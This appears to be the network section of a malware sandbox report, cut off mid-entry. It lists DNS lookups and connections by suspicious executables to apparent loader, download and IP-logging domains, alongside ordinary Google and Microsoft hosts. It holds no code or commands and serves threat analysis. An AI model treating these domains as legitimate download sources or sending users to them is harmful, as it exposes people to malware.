                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iw.gamegame.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.21.221
                                                                                                                                                                                        172.67.200.215

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        dns
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        70 B
                                                                                                                                                                                        102 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        download-serv-235442.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.54.72
                                                                                                                                                                                        172.67.136.97

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        dns
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        74 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iplogger.org

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        88.99.66.31

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        dns
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        69 B
                                                                                                                                                                                        101 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        pcfixmy-download-13.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.46.30
                                                                                                                                                                                        172.67.222.237

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        dns
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        55 B
                                                                                                                                                                                        71 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        34.117.59.81

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        224 B
                                                                                                                                                                                        224 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        59 B
                                                                                                                                                                                        75 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        name-usa.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        176.99.131.168

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        76 B
                                                                                                                                                                                        92 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.quickfastfuriousloaded.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        89.221.213.3

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        63 B
                                                                                                                                                                                        95 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        jom.diregame.live

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.65.45
                                                                                                                                                                                        172.67.158.82

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        fikerty.info
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        90 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        fikerty.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.202.130
                                                                                                                                                                                        104.21.76.249

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        cdn.discordapp.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        64 B
                                                                                                                                                                                        144 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        cdn.discordapp.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        162.159.135.233
                                                                                                                                                                                        162.159.129.233
                                                                                                                                                                                        162.159.133.233
                                                                                                                                                                                        162.159.134.233
                                                                                                                                                                                        162.159.130.233

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        248 B
                                                                                                                                                                                        248 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        mebbing.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        228 B
                                                                                                                                                                                        228 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        mebbing.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        mebbing.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        mebbing.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        mebbing.com

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        fackerty.info
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        59 B
                                                                                                                                                                                        91 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        fackerty.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.155.53
                                                                                                                                                                                        104.21.89.3

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        flamkravmaga.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        248 B
                                                                                                                                                                                        248 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        flamkravmaga.com

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        twcamel.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        228 B
                                                                                                                                                                                        228 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        twcamel.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        twcamel.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        twcamel.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        twcamel.com

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        236 B
                                                                                                                                                                                        236 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        howdycash.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        howdycash.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        howdycash.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        howdycash.com

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        64 B
                                                                                                                                                                                        224 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        lahuertasonora.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        220.125.1.129
                                                                                                                                                                                        210.180.252.88
                                                                                                                                                                                        90.191.200.51
                                                                                                                                                                                        109.102.255.230
                                                                                                                                                                                        187.156.139.53
                                                                                                                                                                                        58.228.68.101
                                                                                                                                                                                        186.6.236.46
                                                                                                                                                                                        211.108.106.8
                                                                                                                                                                                        109.98.58.98
                                                                                                                                                                                        88.158.247.38

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        iplogger.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        74 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iplogger.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        88.99.66.31

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        65 B
                                                                                                                                                                                        105 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        clients2.google.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.217.20.78

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        65 B
                                                                                                                                                                                        81 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        accounts.google.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        216.58.208.109

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        57 B
                                                                                                                                                                                        89 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ezsearch.ru

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.195.177
                                                                                                                                                                                        104.21.92.163

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        56 B
                                                                                                                                                                                        88 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        dns.google

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        8.8.4.4
                                                                                                                                                                                        8.8.8.8

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        60 B
                                                                                                                                                                                        159 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        r3.o.lencr.org

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        95.100.96.171
                                                                                                                                                                                        95.100.96.192

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        66 B
                                                                                                                                                                                        82 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        a.nel.cloudflare.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        35.190.80.1

                                                                                                                                                                                      • 172.67.195.177:443
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        76 B
                                                                                                                                                                                        121 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        clients2.googleusercontent.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        142.250.179.161

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        61 B
                                                                                                                                                                                        77 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ssl.gstatic.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        142.251.36.3

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        60 B
                                                                                                                                                                                        76 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        g-partners.top

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        159.65.63.164

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        90 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        hcaptcha.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.16.168.131
                                                                                                                                                                                        104.16.169.131

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        56 B
                                                                                                                                                                                        72 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        usa01.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        176.99.131.168

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        60 B
                                                                                                                                                                                        76 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        rdanoriran.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        185.183.98.8

                                                                                                                                                                                      • 224.0.0.251:5353
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        204 B
                                                                                                                                                                                        3
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        55 B
                                                                                                                                                                                        145 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        api.ip.sb

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.26.13.31
                                                                                                                                                                                        104.26.12.31
                                                                                                                                                                                        172.67.75.172

                                                                                                                                                                                      • 142.251.36.1:443
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        64 B
                                                                                                                                                                                        288 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.googleapis.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        142.251.36.10
                                                                                                                                                                                        172.217.17.42
                                                                                                                                                                                        172.217.19.202
                                                                                                                                                                                        172.217.168.202
                                                                                                                                                                                        216.58.208.106
                                                                                                                                                                                        172.217.17.106
                                                                                                                                                                                        172.217.17.138
                                                                                                                                                                                        216.58.211.106
                                                                                                                                                                                        142.250.179.138
                                                                                                                                                                                        216.58.214.10
                                                                                                                                                                                        142.251.36.42
                                                                                                                                                                                        172.217.168.234
                                                                                                                                                                                        142.250.179.170
                                                                                                                                                                                        142.250.179.202

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        275 B
                                                                                                                                                                                        5

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                      • 104.16.168.131:443
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        69 B
                                                                                                                                                                                        167 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.msftconnecttest.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        13.107.4.52

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        59 B
                                                                                                                                                                                        285 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        api.ipify.org

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        23.21.224.49
                                                                                                                                                                                        23.21.136.132
                                                                                                                                                                                        50.19.92.227
                                                                                                                                                                                        50.16.226.23
                                                                                                                                                                                        54.235.88.121
                                                                                                                                                                                        54.225.78.40
                                                                                                                                                                                        50.16.220.248
                                                                                                                                                                                        54.235.175.90

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        60 B
                                                                                                                                                                                        76 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        enatuykebe.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        5.44.45.141

                                                                                                                                                                                      • 104.16.169.131:443
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        59 B
                                                                                                                                                                                        75 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        tstamore.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        45.139.184.124

                                                                                                                                                                                      • 104.16.169.131:443
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        55 B
                                                                                                                                                                                        71 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        34.117.59.81

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        157.240.240.35

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        61 B
                                                                                                                                                                                        167 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.binance.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        52.84.150.16
                                                                                                                                                                                        52.84.150.20
                                                                                                                                                                                        52.84.150.33
                                                                                                                                                                                        52.84.150.4

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        54 B
                                                                                                                                                                                        70 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iplis.ru

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        88.99.66.31

                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        73 B
                                                                                                                                                                                        89 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        safebrowsing.googleapis.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        142.250.179.138

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        69 B
                                                                                                                                                                                        167 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.msftconnecttest.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        13.107.4.52

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        64 B
                                                                                                                                                                                        80 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        edgedl.me.gvt1.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        34.104.35.123

                                                                                                                                                                                      • 142.250.179.142:443
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        68 B
                                                                                                                                                                                        150 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iecvlist.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        152.199.19.161

                                                                                                                                                                                      • 216.58.208.99:443
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        68 B
                                                                                                                                                                                        112 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ieonline.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        204.79.197.200

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        157 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        go.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        23.66.21.99

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        63 B
                                                                                                                                                                                        230 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        95.100.186.52

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        206 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.bing.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        204.79.197.200
                                                                                                                                                                                        13.107.21.200

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        76 B
                                                                                                                                                                                        185 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        self.events.data.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        52.114.128.74

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        124 B
                                                                                                                                                                                        188 B
                                                                                                                                                                                        2
                                                                                                                                                                                        2

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ol.gamegame.info

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ol.gamegame.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.200.215
                                                                                                                                                                                        104.21.21.221

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.200.215
                                                                                                                                                                                        104.21.21.221

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        31.13.83.36

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        157.240.201.35

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        128 B
                                                                                                                                                                                        448 B
                                                                                                                                                                                        2
                                                                                                                                                                                        2

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        lahuertasonora.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        lahuertasonora.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        90.191.200.51
                                                                                                                                                                                        116.126.116.6
                                                                                                                                                                                        118.33.109.122
                                                                                                                                                                                        190.146.154.18
                                                                                                                                                                                        211.108.106.8
                                                                                                                                                                                        116.58.10.58
                                                                                                                                                                                        115.91.207.131
                                                                                                                                                                                        118.130.34.112
                                                                                                                                                                                        190.190.202.13
                                                                                                                                                                                        210.207.244.101

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        210.207.244.101
                                                                                                                                                                                        90.191.200.51
                                                                                                                                                                                        116.126.116.6
                                                                                                                                                                                        118.33.109.122
                                                                                                                                                                                        190.146.154.18
                                                                                                                                                                                        211.108.106.8
                                                                                                                                                                                        116.58.10.58
                                                                                                                                                                                        115.91.207.131
                                                                                                                                                                                        118.130.34.112
                                                                                                                                                                                        190.190.202.13

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        31.13.64.35

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
